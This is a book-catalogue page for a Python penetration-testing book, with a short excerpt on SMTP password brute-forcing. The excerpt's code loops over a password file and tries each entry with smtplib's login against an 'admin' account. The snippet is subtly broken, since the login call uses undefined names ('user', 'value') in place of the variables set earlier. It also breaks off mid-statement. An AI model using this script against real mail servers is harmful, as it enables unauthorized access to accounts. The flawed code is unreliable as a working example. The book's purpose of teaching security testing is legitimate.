Book Image

Effective Python Penetration Testing

By : Rejah Rehim
Book Image

Effective Python Penetration Testing

By: Rejah Rehim

Overview of this book

Penetration testing is a practice of testing a computer system, network, or web application to find weaknesses in security that an attacker can exploit. Effective Python Penetration Testing will help you utilize your Python scripting skills to safeguard your networks from cyberattacks. We will begin by providing you with an overview of Python scripting and penetration testing. You will learn to analyze network traffic by writing Scapy scripts and will see how to fingerprint web applications with Python libraries such as ProxMon and Spynner. Moving on, you will find out how to write basic attack scripts, and will develop debugging and reverse engineering skills with Python libraries. Toward the end of the book, you will discover how to utilize cryptography toolkits in Python and how to automate Python tools and libraries.
Table of Contents (16 chapters)
Effective Python Penetration Testing
Credits
About the Author
About the Reviewer
www.PacktPub.com
Preface

SMTP brute-forcing


Simple Mail Transfer Protocol (SMTP) is a standard for e-mail transmission across networks. E-mail servers and other mail transfer agents use SMTP to send and receive e-mail messages. E-mail client applications regularly use SMTP only for sending e-mails. To perform brute-force password auditing against SMTP, we can use the smtplib module, which helps us to connect to SMTP.

As usual, import the required modules:

import sys, smtplib, socket 
from smtplib import SMTP 

Set the IP and USER. You can also get these values as input parameters:

IP = "127.0.0.1" 
USER = "admin"  

Check the SMTP with each and every password in the password list:

attackNumber = 1 
with open('passwordlist.txt') as f: 
    for PASSWORD in f: 
         try: 
               print "-"*12 
               print "User:",USER,"Password:",PASSWORD 
               smtp = smtplib.SMTP(IP) 
               smtp.login(user, value) 
               print "\t...